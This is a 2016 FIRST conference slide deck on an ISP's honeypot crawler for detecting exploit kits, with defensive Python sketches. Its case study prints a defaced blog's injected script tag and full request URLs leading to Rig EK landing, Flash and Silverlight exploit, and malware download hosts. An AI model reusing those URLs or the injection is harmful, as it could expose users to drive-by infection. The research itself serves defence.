Web crawler system for collecting malicious activities (FIRST TC)



slide-1
SLIDE 1

Web crawler system for collecting malicious activities

FIRST TC Mauritius 2016 Hisao Nashiwa Internet Initiative Japan Inc.

slide-2
SLIDE 2

Who am I?

  • Threat analyst at Internet Initiative Japan Inc. (“IIJ” for short).

– IIJ is a Japanese ISP (the first commercial ISP in Japan).

  • Member of the CSIRT team “IIJ-SECT”.

– Our jobs include:

  • Malware analysis
  • Forensic investigation
  • Incident response and handling
  • Developing and operating a honeypot and a web crawler system
  • Surveying trends in malware and attack techniques
  • Writing for our quarterly report (the “IIR”) and blogs

Hisao Nashiwa, CISSP

slide-3
SLIDE 3

Motivation

  • Typical recent malware infection vectors are drive-by downloads and malware-attached email.
  • We want to observe web-based threat trends, especially exploit kit activity.
  • For that reason, we need to crawl a large number of websites aimed at Japanese users (more than 300,000 sites/day) and detect threats on them.

slide-4
SLIDE 4

Issues

  • Simple web crawling tools do not implement a DOM parser that behaves like Internet Explorer's.

– wget, curl, and even SpiderMonkey and jsunpack-n cannot process JavaScript content written for Internet Explorer.
– Thug has a DOM parser, but it is not the same as Internet Explorer's.

  • Several sandbox products can parse the DOM with a real Internet Explorer on a Windows VM, but they take a long time per analysis (5-15 min/website).

slide-5
SLIDE 5

Solution

  • We built an in-house light-weight sandbox (in other words, a web client honeypot) that runs a real Internet Explorer on a Windows VM to crawl websites.

– It takes 15-60 sec/website for light-weight analysis.

  • We use a customized proxy server to analyze the crawling traffic.
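The per-site timings above translate directly into how many VMs have to run in parallel. The following is a rough back-of-the-envelope sketch, not the authors' capacity plan: it assumes the 300,000 sites/day target from the Motivation slide, a crawl that runs around the clock, and no scheduling or VM-reset overhead. The function name `vms_needed` is made up for this illustration.

```python
SECONDS_PER_DAY = 24 * 60 * 60


def vms_needed(sites_per_day: int, seconds_per_site: int) -> int:
    """Minimum number of VMs running in parallel (integer ceiling division)."""
    total_seconds = sites_per_day * seconds_per_site
    return (total_seconds + SECONDS_PER_DAY - 1) // SECONDS_PER_DAY


# Assumed workload: 300,000 sites/day (figure from the Motivation slide).
for label, seconds in [
    ("light-weight sandbox, 15 sec/site", 15),
    ("light-weight sandbox, 60 sec/site", 60),
    ("sandbox product, 5 min/site", 5 * 60),
    ("sandbox product, 15 min/site", 15 * 60),
]:
    print(f"{label}: {vms_needed(300_000, seconds)} VMs")
```

Under these assumptions the light-weight sandbox needs on the order of 50 to 200 parallel VMs, while analyzing every site with a 5-15 min sandbox would need more than a thousand.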

slide-6
SLIDE 6

Web crawler system: Flow and Components

(1) The controller orders the target website.
(2) The client honeypot crawls the website through the proxy, then analyzes the traffic and the VM activity (phase 1 analysis).
(3) If suspicious activity is detected in phase 1 analysis, another sandbox product crawls the same website for deep analysis (takes several minutes).
(4) The controller collects the sandbox report and the phase 1 analysis result, then performs phase 2 analysis to classify the threat.

[Diagram: components and flow]

  • Mgmt server: Controller/DB, Phase2 analyzer
  • Light weight sandbox (client honeypot): Honey Clients, Custom MITM Proxy, Redirection Detector/Analyzer, Phase1 analyzer
  • Sandbox product: Windows VM
  • The internet
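The control flow of steps (2) to (4) can be sketched as follows. This is only an illustration of the escalation logic described on the slide: the `CrawlResult` type, the `crawl` function, and the three callables are hypothetical placeholders, not the actual IIJ components.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class CrawlResult:
    url: str
    suspicious: bool                       # outcome of phase 1
    sandbox_report: Optional[str] = None   # filled only after step (3)
    threat: Optional[str] = None           # filled only after step (4)


def crawl(url: str,
          phase1: Callable[[str], bool],
          sandbox: Callable[[str], str],
          phase2: Callable[[bool, str], Optional[str]]) -> CrawlResult:
    """Run steps (2)-(4) for one URL; the callables are placeholders."""
    result = CrawlResult(url, suspicious=phase1(url))       # step (2)
    if result.suspicious:
        result.sandbox_report = sandbox(url)                 # step (3)
        result.threat = phase2(result.suspicious,
                               result.sandbox_report)        # step (4)
    return result


# Stub analyzers, for illustration only.
demo = crawl("http://example.com/",
             phase1=lambda url: True,
             sandbox=lambda url: "report text",
             phase2=lambda flagged, report: "unclassified")
print(demo)
```

The point of the structure is that the slow sandbox and the phase 2 classifier run only for sites that phase 1 flags.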

slide-7
SLIDE 7

Details of analysis

  • Phase 1 analysis

– HTTP header information

  • FQDN length, destination port number, domain transitions, User-Agent, Content-Type, header length, response size, and so on

– Simple content analysis

  • File magic checking (PE, ZIP (jar, xap), and PDF are treated as suspicious)
  • Decompiling the ActionScript in SWF content with an SWF dumping tool and grepping for suspicious statements (such as XOR operations)

– Windows VM activity

  • Sysmon log, RAM usage, Java-related processes, and so on
  • Flash trace log

These analyses are applied to all sessions (15-60 sec/website).
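The file magic check listed above can be sketched as a prefix test on the response body. This is a minimal illustration, not the in-house analyzer: the function name `suspicious_file_type` is hypothetical, and only the three file types named on the slide are covered, using their well-known leading bytes.

```python
from typing import Optional

# Leading bytes of the file types the slide lists as suspicious.
MAGIC_SIGNATURES = {
    b"MZ": "PE",                    # DOS/PE executable header
    b"PK\x03\x04": "ZIP (jar, xap)",  # ZIP local file header
    b"%PDF": "PDF",
}


def suspicious_file_type(body: bytes) -> Optional[str]:
    """Return the matched file type name, or None if no magic matches."""
    for magic, name in MAGIC_SIGNATURES.items():
        if body.startswith(magic):
            return name
    return None


print(suspicious_file_type(b"MZ\x90\x00\x03"))
print(suspicious_file_type(b"<html><body></body></html>"))
```

Checking the body rather than the Content-Type header matters because a server can declare any content type it likes.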

slide-8
SLIDE 8

Details of analysis(cont.)

  • Sandbox analysis

– We use a commercial sandbox product for automated analysis.

This analysis is applied to 0.1 percent of all sessions (5-15 min/website).
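To see what the 0.1 percent escalation rate means in practice, the arithmetic can be worked through as below. This is a rough estimate under stated assumptions: about 400,000 websites/day (the figure on the "Websites to crawl" slide), one session per website, and sandbox instances that run around the clock. The function names are made up for this sketch.

```python
MINUTES_PER_DAY = 24 * 60


def escalated_sites(sites_per_day: int, per_mille: int = 1) -> int:
    """Sites sent to the sandbox product; 1 per mille equals 0.1 percent."""
    return sites_per_day * per_mille // 1000


def sandbox_instances(sites: int, minutes_per_site: int) -> int:
    """Minimum number of sandbox instances in parallel (ceiling division)."""
    total_minutes = sites * minutes_per_site
    return (total_minutes + MINUTES_PER_DAY - 1) // MINUTES_PER_DAY


sites = escalated_sites(400_000)  # assumed daily crawl volume
print(sites, "sites/day reach the sandbox product")
print(sandbox_instances(sites, 5), "to", sandbox_instances(sites, 15), "instances")
```

Under these assumptions a handful of sandbox instances is enough, which is why phase 1 filtering makes the slow analysis affordable.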

slide-9
SLIDE 9

Details of analysis(cont.)

  • Phase 2 analysis

– Analyze the results of phase 1 analysis and the report from the sandbox product.
– Classify the threat and identify the name of the exploit kit with our in-house pattern match signatures.
– The false positive rate of the pattern matching is fairly low because this analysis is applied only to sessions flagged by phase 1 analysis.

This analysis is applied to 0.1 percent of all sessions (takes several sec/website).
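The idea of classifying a session by pattern match signatures can be illustrated with a toy example. The signature below is invented for this sketch and is not one of the in-house signatures, which the slides do not show; it simply matches a session whose content types go from an HTML page through Flash or Silverlight content to an executable download. The names `TOY_SIGNATURES` and `classify` are hypothetical.

```python
import re
from typing import List, Optional

# Hypothetical toy signature: kit label -> regex over the space-joined
# Content-Type sequence of one session. Not a real detection rule.
TOY_SIGNATURES = {
    "example-kit": re.compile(
        r"text/html "
        r"(?:application/x-shockwave-flash |application/x-silverlight-app )+"
        r"application/x-msdownload"
    ),
}


def classify(content_types: List[str]) -> Optional[str]:
    """Return the first matching signature label, or None."""
    chain = " ".join(content_types)
    for label, pattern in TOY_SIGNATURES.items():
        if pattern.search(chain):
            return label
    return None


session = [
    "text/html",
    "application/x-shockwave-flash",
    "application/x-silverlight-app",
    "application/x-msdownload",
]
print(classify(session))
print(classify(["text/html", "application/javascript"]))
```

A real signature set would presumably combine several features from phase 1 and the sandbox report rather than content types alone.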

slide-10
SLIDE 10

Websites to crawl

  • We crawl about 400,000 websites/day.

– .jp domain websites from the Alexa top 1 million (automatic collection)
– Public offices, local governments, listed companies, media companies, and so on (manual collection)

  • We search Google for such lists and then parse them, which is very tiring.

– Trending websites found through search engine keywords (automatic collection)

slide-11
SLIDE 11

Recent observations

Encounter rate of exploit kit threats in Japan

[Chart: encounter rate (%) by date, 1-Jul-16 to 1-Sep-16, y-axis 0.001 to 0.009; series: Sundown, KaiXin, Rig, Neutrino]

slide-12
SLIDE 12

Recent activities of Rig exploit kit

[Chart: number of defaced websites redirecting to Rig EK by date, 29-Sep-16 to 14-Oct-16, y-axis 20 to 100]

slide-13
SLIDE 13

Rig Exploit kit

  • The Rig EK epidemic is a worldwide trend.
  • The landing page is heavily obfuscated.
  • It exploits Internet Explorer, Adobe Flash, and Silverlight.
  • We observed Locky, Cerber, and Ursnif as exploit payloads.

slide-14
SLIDE 14

Case: a certain blog defaced and redirected visitors to Rig EK

http://blogs.XXXXX.com @Mar-2016

slide-15
SLIDE 15

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

  • 1. GET http://blogs.XXXXX.com/ HTTP/1.1 200 0 25833 text/html
  • 2. GET http://blogs.XXXXX.com/wp-includes/js/wp-emoji-release.min.js HTTP/1.1 200 0 6519 application/javascript
  • 3. GET http://xc.rottencouchtomatoes.com/hlfvviewforumym.php HTTP/1.1 200 0 901 text/javascript
  • 4. GET http://ef.scber.com/?wXqBcrWVLRbJCII=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxhPU6WJVyO1MAwlB4AwSzqrJBKqE HTTP/1.1 200 0 5254 text/html
  • 5. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxhPU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_P93mpMmmA HTTP/1.1 200 0 14779 application/x-shockwave-flash
  • 6. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxhPU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-KAWf6PXl5gv2pHn4oieWX_PR3lJImmA HTTP/1.1 200 0 13938 application/x-silverlight-app
  • 7. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxhPU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PJwnJAmmA&dfsdf=11010 HTTP/1.1 200 0 323584 application/x-msdownload

Hosts, in order: compromised webpage (blogs.XXXXX.com), redirector (xc.rottencouchtomatoes.com), infector (ef.scber.com).
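The "domain transitions" feature from phase 1 analysis can be illustrated on this request chain. The sketch below is an assumption about how such a feature might be computed, not the actual analyzer: it takes the request URLs in order and reports each point where the host changes. The function name `domain_transitions` is hypothetical, and the long query strings on the ef.scber.com requests are left out for brevity.

```python
from typing import List, Tuple
from urllib.parse import urlsplit


def domain_transitions(urls: List[str]) -> List[Tuple[str, str]]:
    """Return (previous_host, next_host) for each change of host in order."""
    # urlsplit().hostname lowercases the host name.
    hosts = [urlsplit(url).hostname for url in urls]
    return [(a, b) for a, b in zip(hosts, hosts[1:]) if a != b]


# Request chain from the slide; query strings omitted for brevity.
chain = [
    "http://blogs.XXXXX.com/",
    "http://blogs.XXXXX.com/wp-includes/js/wp-emoji-release.min.js",
    "http://xc.rottencouchtomatoes.com/hlfvviewforumym.php",
    "http://ef.scber.com/",
    "http://ef.scber.com/index.php",
]
for previous_host, next_host in domain_transitions(chain):
    print(previous_host, "->", next_host)
```

Two host changes in a short chain that ends in an executable download is the kind of pattern that would make a session worth escalating.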

slide-17
SLIDE 17

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

The compromised site loads the redirector (request 3 on slide 15) through an injected script tag:

SCRIPT src = "http://xc.rottencouchtomatoes.com/hlfvviewforumym.php"

slide-19
SLIDE 19

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

The requests to ef.scber.com (4 to 7 on slide 15) play the following roles:

  • 4. Landing page (text/html)
  • 5. Flash exploit (application/x-shockwave-flash)
  • 6. Silverlight exploit (application/x-silverlight-app)
  • 7. Payload = malware!! (application/x-msdownload)

slide-20
SLIDE 20

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

Landing page

slide-21
SLIDE 21

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

Flash Exploit

slide-22
SLIDE 22

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

Silverlight Exploit

slide-23
SLIDE 23

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

Ursnif as encoded payload

slide-24
SLIDE 24

Thank you.